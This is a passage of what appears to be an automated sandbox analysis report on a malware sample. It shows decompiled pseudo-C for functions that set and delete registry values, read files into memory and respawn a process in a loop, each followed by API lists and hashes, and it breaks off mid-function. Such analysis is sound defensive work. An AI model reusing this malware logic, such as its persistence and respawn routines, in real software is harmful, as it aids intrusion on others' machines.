                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                          • String ID: %s:%u$Kobucgekyxca
                                                                                                                                                                                                                                                                          • API String ID: 1891311255-965644793
                                                                                                                                                                                                                                                                          • Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                          • Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005E30(signed char _a4) {
                                                                                                                                                                                                                                                                          				char* _v8;
                                                                                                                                                                                                                                                                          				char _v9;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				char* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				signed int _v29;
                                                                                                                                                                                                                                                                          				int _v36;
                                                                                                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                                                                                                          				int _v72;
                                                                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                                                                          				long _t33;
                                                                                                                                                                                                                                                                          				long _t37;
                                                                                                                                                                                                                                                                          				char* _t45;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				_t31 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          				_v8 = _t31;
                                                                                                                                                                                                                                                                          				_t45 =  *0x4011894; // 0x4013fc4
                                                                                                                                                                                                                                                                          				_v24 = _t45;
                                                                                                                                                                                                                                                                          				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                          				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                          				if(_t33 == 0) {
                                                                                                                                                                                                                                                                          					_v36 = 0x20;
                                                                                                                                                                                                                                                                          					_v28 = 0x20;
                                                                                                                                                                                                                                                                          					_v29 = 0;
                                                                                                                                                                                                                                                                          					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                          						_v29 = 1;
                                                                                                                                                                                                                                                                          						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                          					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						_v72 = 0x10;
                                                                                                                                                                                                                                                                          						E04009BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                          						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10); // executed
                                                                                                                                                                                                                                                                          						_v9 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v9;
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04005e36
                                                                                                                                                                                                                                                                          0x04005e3a
                                                                                                                                                                                                                                                                          0x04005e3f
                                                                                                                                                                                                                                                                          0x04005e42
                                                                                                                                                                                                                                                                          0x04005e48
                                                                                                                                                                                                                                                                          0x04005e4b
                                                                                                                                                                                                                                                                          0x04005e5b
                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                          0x04005e5d
                                                                                                                                                                                                                                                                          0x04005e64
                                                                                                                                                                                                                                                                          0x04005e7e
                                                                                                                                                                                                                                                                          0x04005e86
                                                                                                                                                                                                                                                                          0x04005e8c
                                                                                                                                                                                                                                                                          0x04005e93
                                                                                                                                                                                                                                                                          0x04005e9a
                                                                                                                                                                                                                                                                          0x04005eb2
                                                                                                                                                                                                                                                                          0x04005eba
                                                                                                                                                                                                                                                                          0x04005ec2
                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                          0x04005ed6
                                                                                                                                                                                                                                                                          0x04005ecc
                                                                                                                                                                                                                                                                          0x04005edc
                                                                                                                                                                                                                                                                          0x04005ee2
                                                                                                                                                                                                                                                                          0x04005ee4
                                                                                                                                                                                                                                                                          0x04005ef1
                                                                                                                                                                                                                                                                          0x04005f0b
                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                          0x04005f11
                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                          0x04005f19
                                                                                                                                                                                                                                                                          0x04005f25

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                          • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                          • RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                                                                          • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                          • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                          • Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E04004AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                          							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_v12 = 0;
                                                                                                                                                                                                                                                                          						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                          						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                          						_v16 = _t31;
                                                                                                                                                                                                                                                                          						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                          						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						E040062B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                          						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                          						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          						goto L8;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                                                                          0x04004ac9
                                                                                                                                                                                                                                                                          0x04004ad0
                                                                                                                                                                                                                                                                          0x04004ad8
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                          0x04004ae5
                                                                                                                                                                                                                                                                          0x04004b80
                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b85
                                                                                                                                                                                                                                                                          0x04004b08
                                                                                                                                                                                                                                                                          0x04004b0e
                                                                                                                                                                                                                                                                          0x04004b15
                                                                                                                                                                                                                                                                          0x04004b32
                                                                                                                                                                                                                                                                          0x04004b37
                                                                                                                                                                                                                                                                          0x04004b3a
                                                                                                                                                                                                                                                                          0x04004b44
                                                                                                                                                                                                                                                                          0x04004b4e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b58
                                                                                                                                                                                                                                                                          0x04004b6b
                                                                                                                                                                                                                                                                          0x04004b78
                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004b90
                                                                                                                                                                                                                                                                          0x04004ade
                                                                                                                                                                                                                                                                          0x04004b96
                                                                                                                                                                                                                                                                          0x04004b9b

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04004AD8
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
                                                                                                                                                                                                                                                                          • SetEvent.KERNEL32(?), ref: 04004B78
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04004B85
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04004B90
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                          • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                          • Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E040077B0(void** _a4) {
                                                                                                                                                                                                                                                                          				void** _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void** _v28;
                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          					_v12 = 0x96;
                                                                                                                                                                                                                                                                          					_v16 = 0x1388;
                                                                                                                                                                                                                                                                          					_v8 = _a4;
                                                                                                                                                                                                                                                                          					if( *_v8 != 0) {
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						while(_v20 < 0x96) {
                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                          							_t37 = GetExitCodeProcess(_v8[3],  &_v24); // executed
                                                                                                                                                                                                                                                                          							if(_t37 == 0) {
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if(_v24 != 0x103) {
                                                                                                                                                                                                                                                                          									CloseHandle(_v8[3]);
                                                                                                                                                                                                                                                                          									Sleep(0x7530);
                                                                                                                                                                                                                                                                          									_t40 = E04002070( *_v8);
                                                                                                                                                                                                                                                                          									_t60 = _t60 + 4;
                                                                                                                                                                                                                                                                          									_v8[3] = _t40;
                                                                                                                                                                                                                                                                          									if(_v8[3] != 0) {
                                                                                                                                                                                                                                                                          										_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                          										if((_v8[2] & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          											E04002510(_v8[3], 0x400e290);
                                                                                                                                                                                                                                                                          											_t60 = _t60 + 8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L11;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                          									L11:
                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree( *_v8, 0, 0x8000);
                                                                                                                                                                                                                                                                          						_v28 = _v8;
                                                                                                                                                                                                                                                                          						E040097C0(_v28);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                                                                          0x040077ba
                                                                                                                                                                                                                                                                          0x040077c2
                                                                                                                                                                                                                                                                          0x040077c8
                                                                                                                                                                                                                                                                          0x040077cf
                                                                                                                                                                                                                                                                          0x040077d9
                                                                                                                                                                                                                                                                          0x040077e2
                                                                                                                                                                                                                                                                          0x040077e8
                                                                                                                                                                                                                                                                          0x040077ef
                                                                                                                                                                                                                                                                          0x040077fc
                                                                                                                                                                                                                                                                          0x0400780e
                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                          0x04007818
                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                          0x04007835
                                                                                                                                                                                                                                                                          0x04007840
                                                                                                                                                                                                                                                                          0x0400784c
                                                                                                                                                                                                                                                                          0x04007851
                                                                                                                                                                                                                                                                          0x04007857
                                                                                                                                                                                                                                                                          0x04007861
                                                                                                                                                                                                                                                                          0x0400786d
                                                                                                                                                                                                                                                                          0x04007879
                                                                                                                                                                                                                                                                          0x04007887
                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                          0x0400788c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007863
                                                                                                                                                                                                                                                                          0x04007821
                                                                                                                                                                                                                                                                          0x04007826
                                                                                                                                                                                                                                                                          0x0400788f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007893
                                                                                                                                                                                                                                                                          0x0400781f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04007816
                                                                                                                                                                                                                                                                          0x040078a5
                                                                                                                                                                                                                                                                          0x040078ae
                                                                                                                                                                                                                                                                          0x040078b5
                                                                                                                                                                                                                                                                          0x040078ba
                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                          0x040078bd
                                                                                                                                                                                                                                                                          0x040078c8

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 040077C2
                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 0400780E
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 04007826
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00001388), ref: 04007835
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00007530), ref: 04007840
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 040078A5
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 040078BD
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2326833528-0
                                                                                                                                                                                                                                                                          • Opcode ID: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                          • Instruction ID: 786529089a386be0191f5a1a0158813805cafbe076d78358bbe760b2cac44d20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40971a79621a4715f304bef9d1a112be756b69aca4ab6b623c127bbca2746a66
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62318E74A00209EBFB54CF90C848BAEB7B1FB44305F14C668E905B7280D779BE40CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005CD0(CHAR* _a4) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && lstrlenA(_a4) >= 4) {
                                                                                                                                                                                                                                                                          					_t29 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t29;
                                                                                                                                                                                                                                                                          					if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v16 = GetFileSize(_v12, 0);
                                                                                                                                                                                                                                                                          						if(_v16 > 0) {
                                                                                                                                                                                                                                                                          							_t34 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          							_v20 = _t34;
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								ReadFile(_v12, _v20, _v16,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                          								if(_v24 == _v16) {
                                                                                                                                                                                                                                                                          									_v8 = E040016F0(_v20, _v16);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                          0x04005cd6
                                                                                                                                                                                                                                                                          0x04005ce1
                                                                                                                                                                                                                                                                          0x04005d10
                                                                                                                                                                                                                                                                          0x04005d16
                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                          0x04005d2f
                                                                                                                                                                                                                                                                          0x04005d36
                                                                                                                                                                                                                                                                          0x04005d45
                                                                                                                                                                                                                                                                          0x04005d4b
                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                          0x04005d54
                                                                                                                                                                                                                                                                          0x04005d6d
                                                                                                                                                                                                                                                                          0x04005d79
                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                          0x04005d8b
                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                          0x04005d99
                                                                                                                                                                                                                                                                          0x04005d52
                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                          0x04005da3
                                                                                                                                                                                                                                                                          0x04005d1d
                                                                                                                                                                                                                                                                          0x04005daf

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 04005CEB
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005D10
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 04005D29
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04005D45
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04005D6D
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04005D99
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 04005DA3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 443218420-0
                                                                                                                                                                                                                                                                          • Opcode ID: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                          • Instruction ID: 1c3b7df952a912c4f86c12ad70d9a091debb45511137cc5b62942badbf1a5776
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 071662be6b1e22e21ec0747122ec9fe5ab089f82a602849f769d97fd77600298
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7021EC75A00208FBEB64DFA4DC49BAE77B5EB48705F108659F615BB2C0C778AA80CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04005B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                          				int _v28;
                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                          				char* _v36;
                                                                                                                                                                                                                                                                          				char* _v40;
                                                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                          					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                                          					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                          					_v16 = 0;
                                                                                                                                                                                                                                                                          					while(_v24 < _v28) {
                                                                                                                                                                                                                                                                          						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                                          						if(_v36 != 0) {
                                                                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                                          					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t69;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
